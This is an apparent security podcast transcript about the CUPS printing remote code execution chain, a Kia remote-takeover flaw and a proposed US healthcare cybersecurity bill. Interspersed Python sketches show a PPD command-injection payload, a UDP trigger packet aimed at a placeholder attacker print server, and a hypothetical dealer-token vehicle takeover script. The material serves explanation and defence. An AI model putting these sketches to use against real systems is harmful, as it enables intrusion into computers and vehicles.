This week on the podcast, we cover the "9.9/10 severity vulnerability affecting most Linux systems" that a researcher disclosed last week and what it means for Linux systems administrators. We then discuss a research post into Kia's remote control systems that allowed one researcher to compromise any Kia made in the last decade by just knowing its license plate number. We end with a new bill that was just introduced in the US Senate with the goal of securing the healthcare industry.
Marc Laliberte 0:00
Hey everyone, welcome back to The 443 - Security Simplified. I'm your host, Marc Laliberte, and joining me today is
Corey Nachreiner 0:07
Corey "drain the cups" Nachreiner.
Marc Laliberte 0:11
See, that one's a good one too. On today's episode, we will be discussing the remote code execution vulnerability in a CUPS utility. After that, we'll go over an attack, or hack, or vulnerability, a series of issues that could have compromised every Kia made in the last decade, and then we will end with a proposed set of legislation from the United States Senate that could actually have a meaningful impact on healthcare security. With that, let's go ahead and, I don't know, pour our cup. Oh wow, that was not good at all. I don't know, drink our cup, pour it away, and let's
Corey Nachreiner 0:52
just clean up this filled cup.
Marc Laliberte 0:56
How do you verb that? I don't know if you can. I give up. Let's just roll. So
let's start today with what I thought was going to be one of the biggest, like, vulnerability stories that we've talked about this year, when it was kind of first announced earlier in the day it came out, on Thursday. A software developer called Simone Margaritelli, I probably butchered that, but I'm sorry for him or her. Them, I don't know. I think it's a him, I saw a picture of him, but them is always safe. Yes, there we go, them. So they said that they were going to disclose a 9.9 out of 10 remote code execution vulnerability that might impact every single Linux system. So this was like a holy crap, like, skepticism to start with, as there always is for this, but if it was actually that serious, this would be a pretty insane flaw that caused a lot of issues globally. Well, later that day, they posted a meme-filled write-up, which was not my cup of tea, but I understand that's the writing style for some folks, on a series of vulnerabilities that they discovered in CUPS, which is the Linux printing service. And they disclosed all this, despite there not actually being a patch available, after they got frustrated with some of the handling of these vulnerability reports by the CUPS developers, and even others in the space, as they were trying to work with them. So the vulnerability specifically impacts a utility called cups-browsed, which is a utility for discovering new printers and automatically adding them to a Linux-based system. So this all started on their Ubuntu system when, during a brand new setup, they did a, like, out-of-curiosity check to see what services were just listening wide open on the system, and found something was listening on UDP port 631. They knew TCP 631 was for Internet Printing Protocol communications. The UDP was a little interesting, and just listening by default on all addresses, that 0.0.0.0, was abnormal, so they decided to start looking into it.
Corey Nachreiner 3:20
Yeah, that's not even localhost. That's like everything, yep.
Marc Laliberte 3:25
So they found that this utility would accept connections on it, and if they were formatted correctly and contained a URL, it would then use the Internet Printing Protocol, or IPP, to request printer attributes from that URL in the request. So basically, someone could send a packet, a UDP packet, to this listening service, the cups-browsed utility would then reach out to a URL in that packet and go download attributes for a printer that was hosted there. Then this utility is responsible for saving those attributes into a file using a very specific, like, line-oriented syntax for printer configurations. And unfortunately, it uses fprintf, with some string formatting in there, without any escaping of the user-supplied string, meaning an attacker that can control what is put in here, presumably by owning that remote server that the system is reaching out to, can inject whatever they want into that string that gets written to the file. The file itself, it's called a PPD file, a PostScript Printer Description, and it's basically like a definition file for a printer on a Linux system, and it includes information like what file types that printer supports, how to handle file types that it doesn't support, like using filters and things like that. And it's basically what Linux references when it goes to start a print job with that remote printer. So there are a few attributes in there that are important. One of them, though, is basically, it's called a filter controller, and it tells the local print service, like, how to handle, let's say, a PDF. If the printer didn't know how to read and print a PDF, you could point to another executable that would then be responsible for converting that PDF into something the printer did support. So immediately his thought was, oh, well, can I point to just any arbitrary executable and have it run that when it tries to handle this type of file? But it turns out it is actually limited to only specific executables in a specific directory, /usr/lib/cups/filter, but one of those executables is a special type of generic filter called foomatic-rip. I don't know what the rip stands for. Foomatic, I also have no idea what that stands for. Foo, generally, is the term you would use when describing, like, a placeholder text value or something, so maybe the Linux developer in this case had a sense of humor. But with foomatic-rip, you can actually configure a custom command that this filter runs by using a different PPD attribute called FoomaticRIPCommandLine within that PPD file. So, like, long story short, this attack chain is: you force the target machine to connect to a malicious IPP server by sending a packet to that exposed service pointing to your server as the print server. Then when it requests that IPP attribute string, or all the info that it's going to save in that PPD file, you escape out of the formatting for the string and inject your own PPD attributes in there that otherwise shouldn't have been included, specifically pointing towards a filter and then configuring that filter with a command. And then you wait for a print job to execute that will be sent to that fake printer, which ultimately executes the command. That's how you get code execution.
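To make the injection step a bit more concrete, here's a minimal Python sketch of the general failure pattern Marc describes: a PPD writer that drops attacker-controlled attribute values into a line-oriented file without escaping newlines. The function and attribute values below are illustrative only, not the actual cups-browsed or libppd code.

```python
# Illustrative sketch of the unescaped PPD write problem (not real CUPS code).

def write_ppd(path, attributes):
    """Naively writes printer attributes as '*Key: "value"' lines.

    Because values aren't sanitized, a value containing newlines can
    inject entirely new PPD directives.
    """
    with open(path, "w") as ppd:
        ppd.write('*PPD-Adobe: "4.3"\n')
        for key, value in attributes.items():
            # Equivalent in spirit to the unescaped fprintf the researcher found.
            ppd.write(f'*{key}: "{value}"\n')

# A benign value becomes one attribute line...
benign = {"Manufacturer": "ExampleCorp"}

# ...but an attacker who controls a returned IPP attribute can smuggle in
# extra lines, e.g. a FoomaticRIPCommandLine plus a cupsFilter2 entry that
# points at foomatic-rip (the command here is a harmless placeholder).
malicious = {
    "Manufacturer": (
        'ExampleCorp"\n'
        '*FoomaticRIPCommandLine: "echo pwned > /tmp/poc"\n'
        '*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip'
    )
}

write_ppd("/tmp/benign.ppd", benign)
write_ppd("/tmp/malicious.ppd", malicious)
print(open("/tmp/malicious.ppd").read())
```

Printing the malicious file shows the injected FoomaticRIPCommandLine line sitting in the PPD as if it were legitimate, which is the foothold the rest of the chain relies on.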
So, like, broken down, there are four vulnerabilities he went over there. CVE-2024-47176, which is that cups-browsed listens on all addresses (INADDR_ANY) on port 631 by default and issues IPP requests based off attacker-controlled input. The second one is that libcupsfilters, specifically the attribute handling function in there, doesn't validate or sanitize the returned attributes before handing them off to the actual CUPS system. The third is that libppd does not validate those attributes before writing them to the PPD file. And then the last one is that any value passed to that FoomaticRIPCommandLine via the PPD file will be executed, as the user, as if it were a command. And actually, that last one's interesting, it's currently being contested by a lot of vendors, because it is fundamentally what that filter is supposed to do. It's supposed to be a generic filter that you can configure with a command line to run certain things. So it's not necessarily a vulnerability on its own, but it is part of this attack chain to gain remote code execution on some Linux systems if they're configured in a specific way, meaning the attacker needs access to that listening port. So it has to be enabled by default, which Ubuntu does and Red Hat does not, for example, and that port needs to be exposed to the attacker, so either straight up on the internet with a public IP address assigned to it, or, I don't know, NATed behind a firewall. I think it only listens on IPv4, not IPv6, so even, like, IPv6 probably wouldn't help in that case. But basically, long story short, like, I think it's a serious, important chain of vulnerabilities, but it's one of those where it's a very specific setup that you need in order to actually be vulnerable to this type of attack.
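For the first link in that chain, the write-up describes triggering cups-browsed by sending it a single UDP datagram that advertises a "printer" hosted on an attacker-controlled IPP server. Here's a rough Python sketch of that trigger; the message layout is based on public proof-of-concept descriptions and should be treated as illustrative rather than authoritative, and both addresses are placeholders.

```python
# Rough sketch of the CVE-2024-47176 trigger: one UDP datagram to port 631
# advertising a printer on an attacker-controlled IPP server.
# The payload layout below is based on public write-ups and is illustrative only.
import socket

TARGET = "192.0.2.10"                                    # placeholder: host running cups-browsed
ATTACKER_IPP = "http://198.51.100.5:631/printers/fake"   # placeholder IPP server

# cups-browsed parses legacy CUPS browse packets of roughly the form:
#   "<type> <state> <uri> \"<location>\" \"<info>\""
payload = f'0 3 {ATTACKER_IPP} "Office" "Totally Legit Printer"'

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload.encode(), (TARGET, 631))
sock.close()
```

If the daemon is listening and reachable, it fetches printer attributes from that URL over IPP, which is where the unsanitized attribute values from the previous sketch come into play.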
Corey Nachreiner 9:09
And how many internet-exposed print... like, I get that if you have this running on an internal Linux computer, internally you're going to be exposing that port. But how many are really going to, through their firewall and added network rules, expose it to the internet? Some do, I believe. We could probably do a Shodan search. Less common, though. So
Marc Laliberte 9:33
it seems like the Linux flavor that is, at least by default, vulnerable is some versions of Ubuntu, and that is also probably the most popular cloud-based Linux distribution, maybe behind Amazon Linux, but it's a very popular one to deploy in a cloud environment. But I don't know, are the, like, configured services different on a cloud version or release of Ubuntu versus the local one? Because, yes, I could imagine a scenario where someone goes to AWS, they spin up their own EC2 server, that server, by default, if they choose to, has an IPv4 address attached to it, and if they don't have the right security rules in place, then in theory that could expose that machine to this vulnerability. But again, that is, like, a list of mistakes or errors that would have to be made before it's actually exploitable. It's a bit of a far cry from every Linux machine under the sun being affected by this in its default config state. That's not the case for this one,
Corey Nachreiner 10:36
by the way. I think you alluded to it, but you're diplomatically not going into the drama that this meme-poster type of dude is doing. But what are your thoughts? Like, at the end of his whole thing, he talks about personal considerations, and it sounds like, in his point of view, you know, the actual CUPS maintainers were pretty condescending and took a while to be, you know, concerned with or react to this particular attack. It sounds like
Marc Laliberte 11:05
I, uh, I try not to be judgmental with people that I don't know and that I've never interacted with, and my only interaction with this person is the blog post they wrote. But sometimes you can generally understand someone's mode and mannerisms of communicating based off of what they write, and based off of the post that they wrote and how they described that dramatic situation, my guess is maybe they are, I don't know, maybe they were a little tough to work with.
Corey Nachreiner 11:39
Yeah, I think there are two sides to a story, and while we probably appreciate responsible disclosures and researchers, and I do understand that maybe vendors can be slow or bad to respond, especially in the past, I think sometimes researchers can come to things with a bad attitude that will result in, you know, the vendor not really appreciating that too. So it's hard to say. It is interesting. I did know you wanted to talk about, you mentioned, it's not exactly a 9.9 CVSS, and it sounds like that was something the community or people accused him of, overrating this vulnerability, too.
Marc Laliberte 12:21
Yeah. So he originally, or maybe not originally, but at some point, engaged CERT and their VINCE program, which is, what is it, the Vulnerability Information and Coordination Environment or something, basically a platform and a way to coordinate a disclosure and response with multiple vendors that might be impacted. So in this case, presumably every Linux vendor out there would have been notified through this. At WatchGuard, we get notifications for things affecting, let's say, implementations commonly used on, like, network security appliances, where they'll reach out to WatchGuard, Fortinet, Sophos, Check Point, Cisco, all of us through that platform. So it's a way to coordinate in what should be a controlled environment, letting multiple vendors know about a vulnerability through, like, an embargo that should protect the knowledge of the vulnerability, meaning
Corey Nachreiner 13:13
all the people that are on VINCE should have signed something saying that they shouldn't leak any early information to an outside location. But
Marc Laliberte 13:21
funny enough, as the researcher pointed out in their blog post, someone in the, like, community that was notified about this one on VINCE did leak that info. There was a post on Hack Forums, or Breach Forums.
Corey Nachreiner 13:36
For people watching the video, I've turned it off now, but I dwelled on the hack forum post for a second for you to see.
Marc Laliberte 13:42
Yeah, so clearly, someone that has access as a vendor decided to publish this on Breach Forums, or, I mean, whatever
Corey Nachreiner 13:49
the current name is. It's been pulled down and back up so many times.
Marc Laliberte 13:54
Internally, whenever we get one of these embargoed issues, we put a lot of protections in place to protect the contents of it, like the vulnerability details are strictly need-to-know, only the developers that are working on it have visibility into it. But I could imagine a scenario with another company, maybe, where they just open a ticket in their ticketing system that anyone in the company has visibility into, and then one of their employees, like, some random person from support, maybe, goes and leaks it. So I could see a scenario where that happens. But either way, like, I think at the end of the day, if you're in a vulnerable configuration, which could be Ubuntu desktop in its default setup, and potentially other flavors of Linux, this is an important issue, like, it is a network-accessible chain that can give you remote code execution. But this is not the world-ending vulnerability that I think the researcher really promised early on in that day. So long story short, if you don't need cups-browsed, go remove it, make sure it's not listening on port 631 by default, and maybe make a habit of hardening your systems just in general, and removing services, especially listening services, that are not needed on that system. Agreed, Corey, that sounds like great advice. Thank you.
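If you want a quick way to check the "is anything listening on UDP 631" part of that advice, a minimal Python sketch like the one below works on a Linux host: binding the port succeeds only if nothing else (such as cups-browsed) already holds it. This is just a convenience check, not something from the advisory.

```python
# Quick local check: is something (e.g. cups-browsed) already bound to UDP 631?
import errno
import socket

def udp_port_in_use(port: int = 631) -> bool:
    """Try to bind the port; EADDRINUSE means something already holds it.

    Note: binding ports below 1024 requires root, so run this with
    sufficient privileges or you'll get a PermissionError instead.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.bind(("0.0.0.0", port))
        return False   # bind succeeded, nothing was listening on 0.0.0.0:631
    except OSError as exc:
        if exc.errno == errno.EADDRINUSE:
            return True
        raise          # e.g. PermissionError when not running as root
    finally:
        sock.close()

if __name__ == "__main__":
    if udp_port_in_use():
        print("Something is bound to UDP 631 - check for cups-browsed.")
    else:
        print("Nothing is listening on UDP 631 on this host.")
```

On most distributions you could get the same answer from `ss -ulpn` or by checking whether the cups-browsed service is installed at all, but the Python version keeps the example self-contained.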
Corey Nachreiner 15:17
I think so. I don't even have to add to it.
Marc Laliberte 15:22
I guess, before we pivot off this, though, like, what are your thoughts, Corey? It's hot take time. It seems like we're in a period where vulnerabilities are being over-promised or overhyped more and more frequently. Like, I know every year there is always one that is kind of serious, like Heartbleed or things like that, but it seems like lately everyone is trying to, like, make a name for themselves with vulnerabilities and, like, get fancy marketing names, hype it up as the, you know, this-is-world-ending-for-Linux kind of thing. But it just turns out to be, oh well, with a crapload of asterisks on the end of it, it might be, yeah,
Corey Nachreiner 16:04
I'm with you. Like, I think, to be fair, one of the best ways to get noticed in the information security community is by, like, doing something that gets seen by many and contributes to helping secure folks. So finding, like, a huge zero day somewhere, and, you know, even outside of bug bounty programs, where you're not just trying to get paid for it but you're disclosing it to everyone, it's how a lot of researchers that I follow started their careers. So I get it. But, yeah, I don't think security should be marketing, though, and the older I get, the less I care about all the drama around the memes and the he-said-she-said. Let's just work together to fix the issues. So, yeah, this one does seem overhyped. At least this one doesn't really have a marketing name, though, does it? But this guy starts with, it looks like it's in quoted format, but I don't know who quoted it, the first thing in the advisory is a quote that says, from a generic security point of view, the whole Linux system as it is nowadays is just an endless and hopeless mess of security holes waiting to be exploited. And that alone seems like a super freaking strong statement. And is that what he thinks? Or who's that quote from? Because it shows as a quote on this blog. So on one hand, if it's true, we should talk about it. But I don't know. Sometimes I think we get way too into our own little soapbox issue that may not be as bad to the real world as we think it is.
Marc Laliberte 17:44
I feel like they really missed an opportunity with marketing this one, too. Like, cups overflowing, or cups... yeah,
Corey Nachreiner 17:50
would be... oh gosh, you're right. There are so many technical cups-related marketing names you could do. The one thing I do think is important, though, is showing how chained vulnerabilities that may not be particularly risky on their own can lead to really bad things. So I do always think it's good to point out that these chains can turn into pretty severe things. But you're right, there are many asterisks, yeah. And you just shouldn't be opening up ports randomly that are sitting on your servers, so hopefully just a normal firewall is preventing this from getting past your internal network.
Marc Laliberte 18:32
Agreed, and even, like, the built-in Linux firewalls, by default, should restrict public access to some of these exposed services, like the host-based ones, if you're using them. But it could be an important issue, just way less important than we were led to believe several hours before it was published. So moving on, this second story was a pretty fun research post from a researcher that I've actually been following for a while. His name's Sam Curry. If you haven't read his research, there was a post last June that I think I had queued up to talk about on the podcast, but it didn't make the cut, on vulnerabilities and ongoing attacks he found against his cable modem back then. It was a really interesting research post, you can check out samcurry.net to go see that too. But he just published a new one just last week, and this one describes a set of vulnerabilities in basically all Kia vehicles after 2013 that could allow an attacker to remotely control any vehicle by only knowing the license plate of that vehicle. So they started their journey by looking at owners.kia.com, the website, and the iOS app that Kia owners have for managing their vehicles, because both of them can ultimately execute internet-to-vehicle commands such as starting, stopping, unlocking, locking, honking the horn, things like that. So both of these proxy their web requests, or the API requests, through, let's call it, the user API. In this case, the user API works in basically two stages. As the application or the website wants to do something, the first thing it does is it sends an authentication request to that API for a specific URL, like, let's say, door unlock, with the user session ID, and then it gets back a separate session ID and a vehicle key, like a VIN UUID, basically a locator for the car itself, that it can then use to call the actual API. So it would, for example, say, authorize an unlock command using this token to this car, and then it would send back, okay, you can use the unlock command using this session ID and this VIN key in order to do it. So after understanding that basic API, they then turned to look at the Kia dealership infrastructure, which is responsible for provisioning the initial access to this API too. So they found that the dealership website also uses the exact same API as the customer apps, just different endpoints. So instead of, like, owners.kia.com, it's kiaconnect.kdealer.com, but the API endpoints are fundamentally similar, or almost identical. They got a copy of a, like, invite email for a brand new Kia owner to go set up their account and gain access to all the commands for their vehicle, so they were able to use that to do some poking around within this API. And then they found, also by poking around through this API, several employee-only endpoints for things like vehicle or account lookups, enrollment and unenrollment for users, things like that. So they first started by focusing on the access token that they had from that, like, welcome email, and they tried to see, could I use this access token to use the employee API endpoints? They could not. So you needed to actually be a Kia employee in order to use those ones, which is good. But then there's this quote from their blog post. They said, we thought back to the original owners.kia.com website, so the customer one, and then wondered, what if there was just a way to register as a dealer, generate an access token, and then use that access token here for the employee ones instead?
So they actually found that, let's say, the dealership API endpoint still had a register user endpoint, just like the consumer endpoint. And so they were able to call this, register their own account on the dealership API, because it was exposed, and then log into the dealership API using that, which got them a valid dealer-privileged access token. And then from that, they could access any of the dealership API calls, including ones to add additional users as owners for any given VIN, vehicle identification number. So, long story short, the attack path, which they show a little bit lower in their post, is they generate a dealer token, then fetch the victim's phone number, email, and VIN from, let's call it, the registration database. They then remove the owner, via that email and phone number, from owning their own car. They add the attacker as the primary owner instead, and then they can execute any commands to that VIN. And so by just having the VIN, in this case, they can go in and take over a car. But they took it one step further. They found a third-party API that can turn license plates into vehicle identification numbers, and they built this entire web app where now you can take a license plate number and a state, plug it into the app, it will go take over that car effectively, and then give you a little dashboard for running different commands like locking or unlocking the doors, getting the GPS location, honking the horn, or starting or stopping the engine. And they finally tested this with a rental car that they got from a rental agency to prove it worked. They reported it to Kia in June, and it was just confirmed as resolved as of just this last week.
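To make the shape of that chain easier to follow, here's a heavily simplified Python sketch of the dealer-token takeover flow as Marc describes it. Every endpoint path, parameter name, and response field below is hypothetical, invented only to illustrate the sequence (register as a dealer, get a token, look up a VIN, swap the owner, send commands); it is not the real Kia or kdealer API.

```python
# Hypothetical sketch of the takeover sequence described above.
# None of these endpoints, parameters, or fields are the real Kia API;
# they only illustrate the order of operations the researchers walked through.
import requests

DEALER_API = "https://dealer.example.com/api"   # placeholder base URL


def get_dealer_token() -> str:
    # Step 1: the exposed dealer "register" endpoint hands out an account,
    # and logging in with it returns a dealer-privileged access token.
    creds = {"email": "attacker@example.com", "password": "hunter2"}
    requests.post(f"{DEALER_API}/register", json=creds)
    resp = requests.post(f"{DEALER_API}/login", json=creds)
    return resp.json()["access_token"]


def take_over_vehicle(token: str, vin: str) -> None:
    headers = {"Authorization": f"Bearer {token}"}
    # Step 2: a dealer-only lookup turns a VIN into the owner's contact info.
    owner = requests.get(f"{DEALER_API}/vehicles/{vin}/owner",
                         headers=headers).json()
    # Step 3: remove the real owner, then enroll the attacker as primary.
    requests.post(f"{DEALER_API}/vehicles/{vin}/unenroll", headers=headers,
                  json={"email": owner["email"], "phone": owner["phone"]})
    requests.post(f"{DEALER_API}/vehicles/{vin}/enroll", headers=headers,
                  json={"email": "attacker@example.com", "role": "primary"})
    # Step 4: with "ownership", internet-to-vehicle commands now work.
    requests.post(f"{DEALER_API}/vehicles/{vin}/commands", headers=headers,
                  json={"command": "unlock"})
```

The researchers' real tool added one more stage in front of this: a third-party lookup that resolves a license plate and state to a VIN, which is what made the license-plate-in, unlocked-car-out demo possible.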
Corey Nachreiner 24:26
The demo of using that web tool they made, with just a cell phone, to actually gain control of a Kia in a parking lot was a cool example of what they can do with it.
Marc Laliberte 24:41
It's pretty... like, this issue, so the root cause, if I had to list it, was it looks like Kia used basically the same, like, API schema, let's say, for the user API and the dealership API, probably to save development time. It makes sense to reuse where you can, but they left what should have been protected API endpoints, like registering and even, like, authenticating, exposed, so that even if they're not advertised anywhere or included in any actual app, they're still valid endpoints, and so someone can guess and use them in order to create their own account with these elevated privileges. Then,
Corey Nachreiner 25:21
by the way, did they have to demote the user to add another primary one, or did they have to remove the user to add a primary one? Because I feel like removing a user is a good, like... if you're doing espionage and you want to have control of someone's car, but you don't want them to know, because maybe you're using GPS to track them or whatnot, you would want them to still be able to use their keys and the app to do their stuff. So I would just bring them to below primary, but still leave the user as capable.
Marc Laliberte 25:54
I genuinely have no idea how Kia works, so I don't know. The way they worded it, it sounded like they were taking over as the primary, but maybe the user would still have access. But, yeah, I'm not sure.
Corey Nachreiner 26:06
Hey, I'd hope so. I mean, from an attack perspective, the good news, if they had to literally demote the user from using the car, is at least you would know this happened to you. It'd be even worse if it had happened to you, but you still didn't realize other people had access to the car you were driving around and using. Yep,
Marc Laliberte 26:24
but, uh, let's look, remember last week when we were chatting about, you know, some of the risks of, let's say, intentionally insecure systems from, like, China-based cars? In this example, obviously this wasn't intentional, there's no way Kia meant for this to be a vulnerability, that would be insane. But you can picture, like, if a hostile nation state had discovered this, let's say three, four years from now, when, like, international relations are deteriorating even more, and they decide to say, let's go, you know, screw with every single Kia owner from the last decade in the United States, and effectively brick their cars by locking them and turning them off where they are. That would cause a considerable amount of, like... I don't know, it obviously wouldn't disrupt the US a whole lot, but it would be like, what the heck is going on? But
Corey Nachreiner 27:16
I'm thinking even from an espionage standpoint, if they have their typical journalist and political targets, and not all of them will own Kias, obviously, but if a subset does and they have this, they could maybe not even disrupt that user's travel, but just be added as a primary user in the car and follow them on GPS, use that information to mess with them. And yeah, it certainly could be a very dangerous vulnerability. Car hacks have been a huge deal ever since, was it Chris Valasek and Charlie Miller, the Jeep ones? So, yeah, it's interesting to see them get even easier, and people forget that your car literally has a SIM chip and is always online nowadays.
Marc Laliberte 28:04
And it's, like, it's still really interesting that, you know, things that can control a car and impact a car like this fundamentally can be broken by just basic web app flaws. Now,
Corey Nachreiner 28:16
I know, yeah,
Marc Laliberte 28:19
you don't need to be within, like, signal range or plugged into the actual, like, OBD port, or whatever the heck, on-board diagnostic port. Like, this one is a web app flaw, just on an API, and that's enough. And
Corey Nachreiner 28:32
there's a SIM in there, and the Kia system connects all the cars to that web app for provisioning, apparently. So, yeah, totally weird, crazy, a flaw in that system. Maybe they should find different ways to tie people to the cars.
Marc Laliberte 28:50
I don't even know, like, how do you fundamentally fix this type of issue, like, prevent this type of issue meaningfully? Because, like, clearly there's an appetite to have connected apps that control your car, for, like, starting it out in the street when it's cold outside, or unlocking it when you're walking up with your grocery bags, things like that. Like, there's clearly an appetite there, but there's a decent amount of risk, because these are, like, 1,000-pound killing machines, and if one shuts down randomly on a highway, that could be a pretty damn big deal. Yeah, so I don't have a solution for this. It just feels like, I don't know, we can do better, and there's
Corey Nachreiner 29:27
an appetite for all these features, and they are tiny little conveniences. But you've got to ask, is the convenience worth the risk? I lived my life pretty well with cars, figuring out how to open the trunk with one hand while holding groceries before, you know. So I'm not denying that I'm just as lazy and happy for all these connected features as everyone else, but I think the question is, is it really worth it? I mean, I think the novelty would have me in a car app opening my trunk before I went outside for the first week, but after that... A lot of these features, are they really the most-used features, that are critical to people? Maybe they are too risky, to decide to introduce the car to potentially internet-facing vulnerabilities for. Yeah,
Marc Laliberte 30:18
I don't know, but Kia did fix this one, I assume by removing that registration API, and then just continuing on with their day. But it has... maybe securing
Corey Nachreiner 30:26
it in a different way, who knows? It took a bit, but it's resolved, yeah.
Marc Laliberte 30:34
So moving on, then, for the last story. Just this last week, Senators Wyden of Oregon and Warner of Virginia introduced a new bill into Congress that would force cybersecurity improvements in the healthcare industry. In their little press release for it, they pointed to, like, the Change Healthcare incident with UnitedHealth and other previous ransomware incidents that severely disrupted large portions of the healthcare industry, and clearly something has to change was the basic takeaway from it. They introduced what they're calling the Health Infrastructure Security and Accountability Act, which, I guess, is HISAA instead of HIPAA, and which does quite a few different things. It doesn't have, like, you know, mandatory, well-documented requirements, like you must follow NIST whatever, but it lays out some interesting things that I think could have a meaningful impact on the industry. So let's go through them. First, it updates HIPAA to include mandatory minimum cybersecurity standards for healthcare providers, health plans, and other similar entities. As part of that, it requires regular, documented risk assessments. It also requires a documented business continuity and disaster recovery plan as well, which, on its own, is pretty important, because, like, the big issue from that Change Healthcare incident wasn't that they had ransomware, it's that they were, like, completely incapable, not ready to restore. Exactly, they could not function without those healthcare information systems. Same with, like, most hospitals when they get nailed with ransomware. What was it, Ascension recently? They slow to a... they fall to their knees and they can't continue to function anywhere near as much as they used to. Like, the resiliency is not there in the healthcare industry,
Corey Nachreiner 32:28
by the way, though, this is a funny thing to me. Just as, you know, we started our careers as security experts that had the benefit of talking about all the good practices but not necessarily having to execute them beyond our small little domains, but now we actually are the people that run security for our company. Like, those two things of saying you have to document your business continuity plan, and you have to document, what was the first one, a risk assessment? Like, some people hate when I use this term, 101, but, like, as a CISO, these are all 101 things, you know, have a policy for everything. And business continuity and disaster recovery is just a basic part of, and probably a full domain in, CISSP. So it's amazing to me, still, with the focus cybersecurity is getting, that many, many mature, as far as timeline and how long they've been in business, organizations apparently don't have it. And, like, everyone gets irritated with regulation if it seems like, you know, someone's dictating onerous things that slow down business, but this really seems to be, like, you're not even doing the 101 thing of thinking a little bit about, if things went down, how would you recover, and trying to write down a plan for that.
Marc Laliberte 33:59
And let's remember, like, I'm not saying that it was better back then, but there was a time, relatively recently, when much of healthcare was run on pen and paper, and obviously, like, bringing in computers does make it more efficient, probably less error-prone as well, too. Like, there's a reason that we use a lot of technology, but the fact that we can just totally derail an entire hospital by taking those systems down, and not really having a robust fallback of any sort, is pretty dangerous for what type of institution it is. So that's requirement number one for this. The second one is, it requires covered entities to submit annual independent security audits and to actually run stress tests to show that they are capable of restoring services promptly after an incident, and also the stress tests need to prove that they can continue providing essential care during, and in the recovery period of, an interruption. So basically, what we're getting at is, now they also need to prove they're testing it, they're doing a tabletop exercise of some sort, or even, like, I don't know, but it
Corey Nachreiner 35:10
sounds like, with the stress test, it's an actual technical exercise, it seems like.
Marc Laliberte 35:16
So I liked this one, because, like, it's easy to put a BCDR plan on paper and be like, okay, yep, we're good, but actually proving that it works in the real world? Exactly, that's what this forces.
Corey Nachreiner 35:32
I admit this part is harder, though. We support it, because we are starting to do tabletops too, but in your everyday life, when you already have departments and your own security team doing so much, I guess I can see how it is hard to get to this, let's actually test our thing. But I think for business continuity, you know, basically cyber resiliency, it's a must, because if you don't do a tabletop test... The truth is, I think the reason people forget to really put much effort into BCDR is it's that thing that doesn't happen 99.9% of the time. So it's easy to skip, because you might get away with it for a long, long time, but the second something happens, you not having it is a big deal. But if you only relied on the fact that it's so irregular or so uncommon to have an issue... Like, any time you create a plan or a policy, you know it's not going to be perfect, you know it's going to have to change and evolve depending on if it works or not. So if you don't have the actual tabletops and stress testing, you won't get enough feedback to continuously evolve this plan. So I think the tabletops are very important. That's one I'm less surprised that people don't do, because it is just harder to find the time, but it still surprises me that many of them don't even have a documented plan at all.
Marc Laliberte 36:53
So the third item was requiring the Health and Human Services Department to proactively audit the data security practices of at least 20 entities every single year. So now the government's going to come down and run an audit and make sure that, proactively, you are following all these before something happens. Now, 20 doesn't sound like a lot, but when you consider, like, major hospital chains, the big ones, those would probably be first, like auditing, let's say, Group Health, or, it's not Group Health anymore, what the heck is it called, the other one up in Oregon and California and them all. Anyways, auditing, like, one single hospital chain can get you a large portion of the United States, and so 20 a year will cover a decent amount of at least the major ones too. So I think that's good. The one that was really interesting, they actually take a bit from the Sarbanes-Oxley Act, from financial reporting, where, if you're a publicly traded company, your chief executive officer and your chief financial officer have to, like, attest to the federal government that your compliance and everything is correct, that you are meeting all the requirements of the Sarbanes-Oxley Act. So they're going to add something like that here, where it will require executives to annually certify their compliance with the requirements, and they point out that it is a felony to lie to the federal government, and they'll impose up to a million-dollar fine and up to 10 years in prison for knowingly submitting a report with false information. So holding executives accountable like this
Corey Nachreiner 38:32
means more, more stress for CISOs all over the world, I mean. But no, I agree. I mean, if the community is really that negligent on some of the basics, maybe it does have to come down to this. Yeah, I hope the "knowingly" has a lot of... like, I would never personally try to lie about anything when I'm saying we meet this certification, but at the executive level, knowing that every single detail is right in the audit, it's sometimes hard to know. But I think this is giving it good teeth to make sure people do it. There will be, you know, liability and accountability.
Marc Laliberte 39:13
Next up is, it's going to eliminate the statutory caps on the Health and Human Services fining authority, to make basically meaningful fines against the largest entities count. Like, right now, let's say the cap, I don't know what it is, but let's say it's like $5 million or something. If you go after, you know, Ascension with a fine for negligence and it's $5 million, but their revenue is like 5 billion, it's
Corey Nachreiner 39:34
barely a care, yeah. Then it can become, actually, like, a good stick to beat them with. That's kind of like GDPR, right, where they have two types of fines, you know, it's either this amount of money or a specific percentage of your company's income, because they know bigger companies may not care about the littler fines, but a percentage of their income is the same even if they have a ton of revenue. Yep,
Marc Laliberte 40:02
to pay for all of this, and the new, like, regulatory authority that the HHS is going to have, they're going to require a user fee on all regulated entities, which basically means, like, hospital bills will go up slightly to pay for this. For people, my cynical take is, if a hospital bill is already a cheap $10,000, and it goes to $10,000.05 to cover this, does it
Corey Nachreiner 40:25
really matter? As long as they don't charge hospital prices. Like, in a hospital you pay $10 for an aspirin, so I hope it only goes up what should be five cents more, because the government is charging an actual, you know, real price for the service. Yep, not a made-up, hugely inflated one. And then, it sounds like, what I like about it, which I think you're about to get to now, is there is some incentive?
Marc Laliberte 40:53
Yeah, because it would be easy to write all this and say, you must now adhere to this, and here are all the rules, good luck. But they recognize also that there's a reason, like, hospitals are this way, especially, like, smaller ones. Think of, like, rural ones that are in areas where there's just not any money there, even if they wanted to make a tidy profit. And so part of this is providing $800 million in investment payments to rural and urban safety net hospitals and $500 million to all hospitals to adopt these enhanced security standards. So a billion and a half bucks or so, just shy.
Corey Nachreiner 41:31
I wonder, with those funds, are the hospitals technically paying for that incentive? Because being part of the, you know, having to register and pay that fee, which they're going to, of course, pass on to customers, the patients... Are we paying for that incentive too?
Marc Laliberte 41:46
I am also a little annoyed that, like... so I 1,000% support this for, like, the rural and, like, urban safety net ones, the ones where, like, it may be the only hospital in a 300-mile radius and even then they're still broke. I hope that these payments don't go to the places like Kaiser and, like, Ascension and St. John's, like those types of ones, Baylor's, where, you know, they're raking in a ton of money, they can pay for their own dang cybersecurity. So I really hope that there are some guardrails
Corey Nachreiner 42:17
on that, yeah. I agree. I don't want another system for hospitals to take subsidy-like incentives from if they're already super rich.
Marc Laliberte 42:25
